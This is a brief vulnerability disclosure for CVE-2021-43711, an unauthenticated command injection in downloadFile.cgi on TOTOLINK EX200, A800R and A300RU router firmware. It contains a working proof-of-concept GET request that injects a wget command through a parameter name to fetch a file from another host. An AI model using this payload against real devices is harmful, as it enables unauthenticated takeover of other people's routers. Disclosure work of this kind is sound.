CVE-2021-43711

Command injection of ToTolink series

Preface

​ Last year, I found some command injection problems on totolink ex200 products, but I found that this vulnerability does not only exist in ex200. Due to the uniformity of embedded device firmware of the manufacturer, this vulnerability will still exist if the same type of firmware is used in different devices。

​ I will sort out the devices with cve-2021-43711 type vulnerabilities and their affected firmware within a period of time

​ This vulnerability is very simple to exploit and does not require authentication

List of affected equipment（updating）

​ Here is a brother who sorted out all the device types and output the CVE ID

​ total

1:
ToTolink EX200 http://totolink.net/home/menu/detail/menu_listtpl/download/id/144/ids/36.html

link :http://totolink.net/data/upload/20210428/7979e841521515eb83b45aacf5b67f9a.zip

Firmware: TOTOLINK_CS133E-EN_EX200_WX005_8196E_SPI_4M32M_V4.0.3c.7646_B20201211_ALL.web

2:
TOTOLINK A800R http://totolink.net/home/menu/detail/menu_listtpl/download/id/166/ids/36.html

link :http://totolink.net/data/upload/20201223/5425d375a083ea6952abc47ee7cc4a6b.zip

Firmware: V4.1.2cu.5137_B20200730
3:
TOTOLINK A300RU http://totolink.net/home/menu/detail/menu_listtpl/download/id/168/ids/36.html

LINK : http://totolink.net/data/upload/20210111/c5bd257ad1a977679618faee0526bf0c.zip

Firmware: V5.9c.5185_B20201128

Describe

​ The downloadFile.cgi binary file has a command injection vulnerability when receiving GET parameters. The parameter name can be constructed for unauthenticated command execution

POC

GET /cgi-bin/downloadFlile.cgi?;wget${IFS}http://192.168.0.111:801/mm.txt;=hahah HTTP/1.1

Host: 192.168.0.254

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

TEXT